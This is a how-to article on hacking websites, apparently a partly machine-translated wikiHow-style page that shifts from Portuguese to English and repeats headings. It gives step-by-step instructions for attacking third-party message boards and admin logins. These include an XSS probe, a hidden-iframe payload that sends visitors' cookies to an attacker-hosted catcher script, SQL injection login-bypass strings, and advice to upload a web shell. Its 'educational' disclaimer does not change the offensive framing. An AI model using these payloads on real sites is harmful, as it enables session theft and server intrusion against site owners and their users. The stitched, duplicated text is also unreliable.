Como hackear um site?

Embora não seja possível hackear todos os sites
Embora não seja possível hackear todos os sites, você pode hackear um vulnerável, como um quadro de mensagens.

Sempre quis saber como hackear um site? Embora não seja possível hackear todos os sites, você pode hackear um vulnerável, como um quadro de mensagens. Este guia mostrará como hackear um site usando script entre sites e ataques de injeção. Também lhe dará dicas sobre como se preparar para o sucesso.

Sempre quis saber como hackear um site
Sempre quis saber como hackear um site?

Observação: este guia é estritamente para fins educacionais, seja para ajudar as pessoas a aprender a hackear chapéu branco ou para ver como os hackers trabalham para proteger melhor seus próprios sites. Este tutorial aborda dois métodos de hacking, script entre sites e injeção de SQL.

Método 1 de 3: usando script entre sites

  1. 1
    Encontre um site vulnerável onde você possa postar conteúdo. Um quadro de mensagens é um bom exemplo. Lembre-se de que, se o site não for vulnerável a um ataque de script entre sites, isso não funcionará.
  2. 2
    Vá para criar uma postagem. Você precisará digitar algum código especial no "post" que irá capturar os dados de todos que clicarem nele.
    • Você vai querer testar para ver se o sistema filtra o código. Publicar
      <script> window.alert ("test") </script> 
      Se uma caixa de alerta for exibida quando você clicar em sua postagem, o site está vulnerável a ataques.
  3. 3
    Crie e envie seu coletor de cookies. O objetivo desse ataque é capturar os cookies de um usuário, o que permite que você acesse sua conta para sites com logins vulneráveis. Você precisará de um coletor de cookies, que irá capturar os cookies do seu alvo e redirecioná-los. Faça upload do catcher em um site ao qual você tenha acesso e que ofereça suporte a PHP e seja vulnerável à execução remota de código por upload. Um exemplo de código de captura de cookies pode ser encontrado na seção de amostra.
  4. 4
    Publique com seu coletor de cookies. Insira um código adequado na postagem que irá capturar os cookies e enviá-los ao seu site. Você deve inserir algum texto após o código para reduzir as suspeitas e evitar que sua postagem seja excluída.
    • Um exemplo de código seria semelhante a
      <iframe frameborder="0" height="0" width="0" src="javascript...://void(document.location=YOURURL/cookiecatcher.php?c= document.cookie)></iframe>
  5. 5
    Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
This guide will show you how to hack a site using cross site scripting as well as injection attacks
This guide will show you how to hack a site using cross site scripting as well as injection attacks.

Method 2 of 3: executing injection attacks

  1. 1
    Find a vulnerable site. You will need to find a site that is vulnerable, due to an easily accessible admin login. Try searching on your favorite search engine for admin login.asp or admin login.php.
  2. 2
    Login as an admin. Type admin as the username and use one of a number of different strings as the password. These can be any one of a number of different strings but a common example is 1'or'1'='1 or 2'='2.
  3. 3
    Be patient. This is probably going to require a little trial and error.
  4. 4
    Access the website. Eventually, you should be able to find a string that allows you admin access to a website, assuming the website is vulnerable to attack. Then, logged in as an administrator, you can perform further actions, such as uploading a web shell to gain server-side access if you can perform a file upload.
Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code
Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload.

Method 3 of 3: setting up for success

  1. 1
    Learn a programming language or two. If you want to really learn how to hack websites, you will need to understand how computers and other technologies work. Learn to use programming languages like Python, PHP (necessary for exploiting server-side vulnerabilities) or SQL, so that you can gain better control of computers and identify vulnerabilities in systems.
  2. 2
    Have basic HTML literacy. You will also need to have a really good understanding of HTML and JavaScript if you want to hack websites in particular. This can take time to learn but there are lots of free ways to learn on the internet, so you will certainly have the opportunity if you want to take it.
  3. 3
    Consult with whitehats. Whitehats are hackers who use their powers for good, exposing security vulnerabilities and making the internet a better place for everyone. If you are wanting to learn to hack and use your powers for good or if you want to help protect your own website, you might want to contact some current whitehats for advice.
  4. 4
    Research hacking. If you are wanting to learn to hack or if you just want to protect yourself, you will need to do a lot of research. There are so many different ways that websites can be vulnerable and the list is ever-changing, so you will need to be constantly learning.
  5. 5
    Keep up to date. Because the list of possible hacks is ever-changing, and new vulnerabilites are discovered, you will need to be sure you keep up to date. Just because you are protected from a certain type of hack now doesn't mean you will be safe in the future!


  • Go to hacker forums to get lots of helpful tips.
  • This tutorial is strictly for educational purposes, either to help people begin to learn white hat hacking or to see how hackers work in order to protect their own sites better.


  • If you read this article you do not immediately become a hacker. You MUST explore your skills and practice, practice, practice.

Community Q&A

  • Can I get caught while hacking?
    Yes, you can get caught, and you can also get in serious legal trouble for it depending on the nature of your hacking.
  • Can I learn programming online for free?
    Yes, you can find interactive python learning or you could use a written tutorial made by others, but remember to understand the code and don't just copy and paste it.
  • How can I quickly learn Python or Sql when I already have experience in other programming languages?
    Learn to make variables and most base functions. Python shares a lot of the same methods as C, for example.
  • What does it mean when it says 'alert(1")'?
    If you use window.alert and an alert pops up, it is vulnerable.
  • What does it mean when it says Alert(XSS)?
    That means a message is going to pop up saying the variable XSS.
  • What code can you write in Notepad?
    You can write any code in Notepad, you just have to save the file in required format. However, for executing that code, you need some software; for example for HTML you need browser, for Java you need jav jdk.
  • Can I hack using Python?
    You can't expect to hack a site by knowing a single programming language and nothing about html and/or javascript. It is also important to note that hacking is illegal, and you face consequences if you get caught.
  • What does Window.Alert(test) do?
    Window.Alert is a Javascript function that calls up an alert window containing text.
  • How can I protect my site from being hacked?
    The least time consuming way is to hire freelancers that find and patch vulnerabilities in your website. It's called ethical hacking.
  • How can I see if any Javascript is going to pop up?
    You will need to post a Javascript in the website, like 'window.alert ('test').' this script makes an alert window, and, if that happens, it is vulnerable or hackable.